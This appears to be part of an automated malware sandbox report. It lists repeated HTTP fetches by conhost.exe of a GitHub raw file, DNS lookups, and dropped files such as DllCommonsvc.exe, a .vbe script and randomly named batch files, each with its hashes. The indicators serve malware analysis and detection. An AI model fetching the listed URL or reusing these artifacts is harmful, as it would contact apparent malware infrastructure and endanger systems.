                                              • 185.199.109.133:443
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                tls, http
                                                conhost.exe
                                                897 B
                                                5.1kB
                                                8
                                                9

                                                HTTP Request

                                                GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                HTTP Response

                                                200
                                              • 185.199.109.133:443
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                tls, http
                                                conhost.exe
                                                914 B
                                                5.1kB
                                                8
                                                9

                                                HTTP Request

                                                GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                HTTP Response

                                                200
                                              • 185.199.109.133:443
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                tls, http
                                                conhost.exe
                                                897 B
                                                5.1kB
                                                8
                                                9

                                                HTTP Request

                                                GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                HTTP Response

                                                200
                                              • 185.199.109.133:443
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                tls, http
                                                conhost.exe
                                                861 B
                                                5.1kB
                                                8
                                                10

                                                HTTP Request

                                                GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                HTTP Response

                                                200
                                              • 185.199.109.133:443
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                tls, http
                                                conhost.exe
                                                914 B
                                                5.1kB
                                                8
                                                9

                                                HTTP Request

                                                GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                HTTP Response

                                                200
                                              • 185.199.109.133:443
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                tls, http
                                                conhost.exe
                                                914 B
                                                5.1kB
                                                8
                                                9

                                                HTTP Request

                                                GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                HTTP Response

                                                200
                                              • 8.8.8.8:53
                                                133.211.185.52.in-addr.arpa
                                                dns
                                                73 B
                                                147 B
                                                1
                                                1

                                                DNS Request

                                                133.211.185.52.in-addr.arpa

                                              • 8.8.8.8:53
                                                85.49.80.91.in-addr.arpa
                                                dns
                                                70 B
                                                145 B
                                                1
                                                1

                                                DNS Request

                                                85.49.80.91.in-addr.arpa

                                              • 8.8.8.8:53
                                                73.159.190.20.in-addr.arpa
                                                dns
                                                72 B
                                                158 B
                                                1
                                                1

                                                DNS Request

                                                73.159.190.20.in-addr.arpa

                                              • 8.8.8.8:53
                                                95.221.229.192.in-addr.arpa
                                                dns
                                                73 B
                                                144 B
                                                1
                                                1

                                                DNS Request

                                                95.221.229.192.in-addr.arpa

                                              • 8.8.8.8:53
                                                raw.githubusercontent.com
                                                dns
                                                conhost.exe
                                                71 B
                                                135 B
                                                1
                                                1

                                                DNS Request

                                                raw.githubusercontent.com

                                                DNS Response

                                                185.199.109.133
                                                185.199.111.133
                                                185.199.110.133
                                                185.199.108.133

                                              • 8.8.8.8:53
                                                133.109.199.185.in-addr.arpa
                                                dns
                                                74 B
                                                118 B
                                                1
                                                1

                                                DNS Request

                                                133.109.199.185.in-addr.arpa

                                              • 8.8.8.8:53
                                                50.23.12.20.in-addr.arpa
                                                dns
                                                70 B
                                                156 B
                                                1
                                                1

                                                DNS Request

                                                50.23.12.20.in-addr.arpa

                                              • 8.8.8.8:53
                                                13.86.106.20.in-addr.arpa
                                                dns
                                                71 B
                                                157 B
                                                1
                                                1

                                                DNS Request

                                                13.86.106.20.in-addr.arpa

                                              • 8.8.8.8:53
                                                15.164.165.52.in-addr.arpa
                                                dns
                                                72 B
                                                146 B
                                                1
                                                1

                                                DNS Request

                                                15.164.165.52.in-addr.arpa

                                              • 8.8.8.8:53
                                                92.12.20.2.in-addr.arpa
                                                dns
                                                69 B
                                                131 B
                                                1
                                                1

                                                DNS Request

                                                92.12.20.2.in-addr.arpa

                                              • 8.8.8.8:53
                                                23.236.111.52.in-addr.arpa
                                                dns
                                                72 B
                                                158 B
                                                1
                                                1

                                                DNS Request

                                                23.236.111.52.in-addr.arpa

                                              • 8.8.8.8:53
                                                225.162.46.104.in-addr.arpa
                                                dns
                                                73 B
                                                147 B
                                                1
                                                1

                                                DNS Request

                                                225.162.46.104.in-addr.arpa

                                              MITRE ATT&CK Enterprise v15

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

                                                Filesize

                                                1KB

                                                MD5

                                                baf55b95da4a601229647f25dad12878

                                                SHA1

                                                abc16954ebfd213733c4493fc1910164d825cac8

                                                SHA256

                                                ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924

                                                SHA512

                                                24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                Filesize

                                                2KB

                                                MD5

                                                d85ba6ff808d9e5444a4b369f5bc2730

                                                SHA1

                                                31aa9d96590fff6981b315e0b391b575e4c0804a

                                                SHA256

                                                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                SHA512

                                                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                944B

                                                MD5

                                                d28a889fd956d5cb3accfbaf1143eb6f

                                                SHA1

                                                157ba54b365341f8ff06707d996b3635da8446f7

                                                SHA256

                                                21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                                                SHA512

                                                0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                944B

                                                MD5

                                                2e907f77659a6601fcc408274894da2e

                                                SHA1

                                                9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

                                                SHA256

                                                385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

                                                SHA512

                                                34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                944B

                                                MD5

                                                e243a38635ff9a06c87c2a61a2200656

                                                SHA1

                                                ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc

                                                SHA256

                                                af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f

                                                SHA512

                                                4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                944B

                                                MD5

                                                bd5940f08d0be56e65e5f2aaf47c538e

                                                SHA1

                                                d7e31b87866e5e383ab5499da64aba50f03e8443

                                                SHA256

                                                2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

                                                SHA512

                                                c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                944B

                                                MD5

                                                3a6bad9528f8e23fb5c77fbd81fa28e8

                                                SHA1

                                                f127317c3bc6407f536c0f0600dcbcf1aabfba36

                                                SHA256

                                                986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

                                                SHA512

                                                846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                944B

                                                MD5

                                                cadef9abd087803c630df65264a6c81c

                                                SHA1

                                                babbf3636c347c8727c35f3eef2ee643dbcc4bd2

                                                SHA256

                                                cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

                                                SHA512

                                                7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                944B

                                                MD5

                                                a8e8360d573a4ff072dcc6f09d992c88

                                                SHA1

                                                3446774433ceaf0b400073914facab11b98b6807

                                                SHA256

                                                bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b

                                                SHA512

                                                4ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                944B

                                                MD5

                                                aaaac7c68d2b7997ed502c26fd9f65c2

                                                SHA1

                                                7c5a3731300d672bf53c43e2f9e951c745f7fbdf

                                                SHA256

                                                8724dc2c3c8e8f17aeefae44a23741b1ea3b43c490fbc52fd61575ffe1cd82bb

                                                SHA512

                                                c526febd9430413b48bed976edd9a795793ad1f06c8ff4f6b768b4ad63f4d2f06b9da72d4fcfa7cb9530a64e2dc3554f5ad97fd0ab60129701d175f2724ef1ac

                                              • C:\Users\Admin\AppData\Local\Temp\J6RTVEKunr.bat

                                                Filesize

                                                198B

                                                MD5

                                                b8d4e2e1f447722ca26683c8113891ab

                                                SHA1

                                                6063919402158e6f09f2f5031f4c22748bd55b32

                                                SHA256

                                                193e6dae55793a6b4e2375a0608dfb33181b1924d385df51deaf13e5e01b4763

                                                SHA512

                                                5446fe649e2537fa58cf920a1004ce53465ad81a6dde7bde484a81c57f3644732f440e9cb81ed4b3859bac890d807461a16cda4bb496458eb4d6fce569836c9c

                                              • C:\Users\Admin\AppData\Local\Temp\N4rS0hE0df.bat

                                                Filesize

                                                198B

                                                MD5

                                                398157ecc41f37e30af5665bd6a945ad

                                                SHA1

                                                fb85f3d77ecfacf87b414586cc3f6164a0bfe393

                                                SHA256

                                                47f5c584bd06a6d1d86b0865675e28aa321acedcdc97a01db8a8b485ae02f90a

                                                SHA512

                                                d59b7c0dfa0952f55bbc2e47b38a266cbef17b30b6b766b240cec080470fb985c021aba25fdad0ee3677780e7595afb27b19594b649fbf41cfae8ca3c377bac8

                                              • C:\Users\Admin\AppData\Local\Temp\SvvYNrLnHE.bat

                                                Filesize

                                                198B

                                                MD5

                                                ed54c357bd3ee791935b238372c423f9

                                                SHA1

                                                8c0cd7cc85d93e623c049dab2842386f8176a5b9

                                                SHA256

                                                9ca7617c8158c41a85991b08efd3a4a57419326d75673dbc6e945e646647864d

                                                SHA512

                                                ac93ed6cfc29f2f3421171985ae8791f8da69f274a02aee5d72aaed436829470070e3f25fa326f32f4b1d2a6ecff2d513166cea5b80d127675bfb90685d88002

                                              • C:\Users\Admin\AppData\Local\Temp\Ww6iFNwlpp.bat

                                                Filesize

                                                198B

                                                MD5

                                                bf5b158dfca2117c589b15012d668534

                                                SHA1

                                                e780e2e885440dce3e2fd30a25d03d249567b665

                                                SHA256

                                                dcf526fc2f082cb2543977566ce36277de5e440952574bd77c9ce48626045635

                                                SHA512

                                                4cf6fe3eedd3aaa91a8fcd39952b50ced7011f4adc5b942052a792cbd2bebb790aacfd89806a6f732c4b6214a3348a7e14d217095420b9e80f3490aa5aceb4fa

                                              • C:\Users\Admin\AppData\Local\Temp\Xnyek1SZun.bat

                                                Filesize

                                                198B

                                                MD5

                                                c3e9ea2a6a20c09d240f384ada1a034e

                                                SHA1

                                                45dad97758ff6e7eed327fca5b87b85a1052b58d

                                                SHA256

                                                188431cd28bdf6bd61f206875ae405ac29b588ab76c219c3cbb34525d4ba6867

                                                SHA512

                                                2a5cc2f919309139ae56e3fc826b69e70ae6861cc7581a8df3706fd6c376e49701477bbed7a97438c5a02fa1dda05767de9409475b4f27941d4743fd5ffa1bb2

                                              • C:\Users\Admin\AppData\Local\Temp\Ys8lvSze9b.bat

                                                Filesize

                                                198B

                                                MD5

                                                a5ed04848e27ce992974af6976ac5c71

                                                SHA1

                                                596f4859533e61645d74fd26026c507db21f1251

                                                SHA256

                                                2a2d459164d8da0e8e7fdc91f13e75a2330becbe8de96a204b168cd86f2cee19

                                                SHA512

                                                4fb55e616212bdc8c8d3cc09e7280893e5e77013d2e52702e0d39d7f3029aa7662d336ca92c3a1680e49befb53f7b9a01fcc0025ed6b435730d4973afdb97f4b

                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ysdtarew.lm1.ps1

                                                Filesize

                                                60B

                                                MD5

                                                d17fe0a3f47be24a6453e9ef58c94641

                                                SHA1

                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                SHA256

                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                SHA512

                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                              • C:\Users\Admin\AppData\Local\Temp\bf2k7CZMYL.bat

                                                Filesize

                                                198B

                                                MD5

                                                f78ff9cd31a189bb8f21426072880dc5

                                                SHA1

                                                cd5f2b714e7004fbb05b58f637f259ea6f899616

                                                SHA256

                                                512b3ad6a2ae85aa67931654fd27c1b7c1cf25431a625b9b460bbc9c1cd129fb

                                                SHA512

                                                4098ab247cc180e58fdbcd198f593c4357528e7749d20fa9f603ad718ce8cb00a02c1888e2df518b8150fa283df6c599bfcbf43c53e842700576479991b83a95

                                              • C:\Users\Admin\AppData\Local\Temp\iYTmIkWLiw.bat

                                                Filesize

                                                198B

                                                MD5

                                                a15c6b71d7d2b3c59c1b21cc17833936

                                                SHA1

                                                7a2fde2cee379bf2cd4893be371f2b3dd4c30322

                                                SHA256

                                                bb2b76623e0ea6a57e3aa074e38fd81fb8d1c38cce9efc0db1e087355379eb3d

                                                SHA512

                                                da60f820a3ea16eb01d225e6f3fabae052ee26d5d103d0301f08a07d4aa135f95313498880cfe8b1ea6c23fa6cbf4a5e395407555b5a1faafced70f4b68c5c0d

                                              • C:\Users\Admin\AppData\Local\Temp\lZfwAG7KGX.bat

                                                Filesize

                                                198B

                                                MD5

                                                a0581c2414a59c107865ff4cdc46f07b

                                                SHA1

                                                e1a35c054a20be0dcc3317b0304ce3e676aae3f1

                                                SHA256

                                                ff3d53ff1641b812ccce594bdd70ced0f91b393dc9f1799eff77061b61b2f7ab

                                                SHA512

                                                c9a9ab39063a431e5c34461f4c3c3ff50a8842f4a89a1e211b69e087db772ee783ddc1044c6a86e9a5bb3ca5dc2dd64950ce83369a7d623280f72981363d6cd4

                                              • C:\Users\Admin\AppData\Local\Temp\mQXsfud8LV.bat

                                                Filesize

                                                198B

                                                MD5

                                                f738e6d2808d82f6e1dc392a7c9895af

                                                SHA1

                                                fe03b8a8692612d3643e65f8cae300ff27d50fc4

                                                SHA256

                                                d6475bd5f9a67eeb4eb390c37b64161b74f6cc655428d6b8888aa4fbf95329aa

                                                SHA512

                                                2227bbe14079e8cebcb523141ed411789df2d394cbd684ae821ecdfe9110f805c9d563b55080772d1b4322e5dfdc35ef5e49cc57f841c9c56770c8379a56d2ce

                                              • C:\providercommon\1zu9dW.bat

                                                Filesize

                                                36B

                                                MD5

                                                6783c3ee07c7d151ceac57f1f9c8bed7

                                                SHA1

                                                17468f98f95bf504cc1f83c49e49a78526b3ea03

                                                SHA256

                                                8ab782f0f327a2021530e7230d3aee8abbecb7eed59482a3a46e78b9e3862322

                                                SHA512

                                                c6012d4bfac1ed14d0fd9f0eabd0e1c3d647b343db292a907b246271d52a4b7469c809db43910ddba2e8c5045f9cb3d24d0af62d363281e6cb8b39ee94a183e8

                                              • C:\providercommon\DllCommonsvc.exe

                                                Filesize

                                                1.0MB

                                                MD5

                                                bd31e94b4143c4ce49c17d3af46bcad0

                                                SHA1

                                                f8c51ff3ff909531d9469d4ba1bbabae101853ff

                                                SHA256

                                                b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

                                                SHA512

                                                f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

                                              • C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe

                                                Filesize

                                                197B

                                                MD5

                                                8088241160261560a02c84025d107592

                                                SHA1

                                                083121f7027557570994c9fc211df61730455bb5

                                                SHA256

                                                2072cc9a4a3b84d4c5178ab41c5588eea7d0103e3928e34d64f17bf97f3d1cc1

                                                SHA512

                                                20d9369dd359315848ea30144383a0bb479d86059fdbc3b3256ac84f998193512feb3b1799ab663619920c99fe7e0ebba33ada31a3855094b956fcd351c90478

                                              • memory/1440-15-0x000000001AEE0000-0x000000001AEEC000-memory.dmp

                                                Filesize

                                                48KB

                                              • memory/1440-16-0x0000000002600000-0x000000000260C000-memory.dmp

                                                Filesize

                                                48KB

                                              • memory/1440-14-0x00000000025F0000-0x0000000002602000-memory.dmp

                                                Filesize

                                                72KB

                                              • memory/1440-13-0x00000000001B0000-0x00000000002C0000-memory.dmp

                                                Filesize

                                                1.1MB

                                              • memory/1440-17-0x000000001AEF0000-0x000000001AEFC000-memory.dmp

                                                Filesize

                                                48KB

                                              • memory/1440-12-0x00007FFAC1EA3000-0x00007FFAC1EA5000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/1900-82-0x000002799EF40000-0x000002799EF62000-memory.dmp

                                                Filesize

                                                136KB

                                              • memory/4828-342-0x0000000002B90000-0x0000000002BA2000-memory.dmp

                                                Filesize

                                                72KB

                                              • memory/4896-239-0x000000001B540000-0x000000001B552000-memory.dmp

                                                Filesize

                                                72KB

                                              • memory/5360-298-0x0000000002A60000-0x0000000002A72000-memory.dmp

                                                Filesize

                                                72KB

                                              • memory/5740-329-0x0000000001010000-0x0000000001022000-memory.dmp

                                                Filesize

                                                72KB

                                              We care about your privacy.

                                              This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.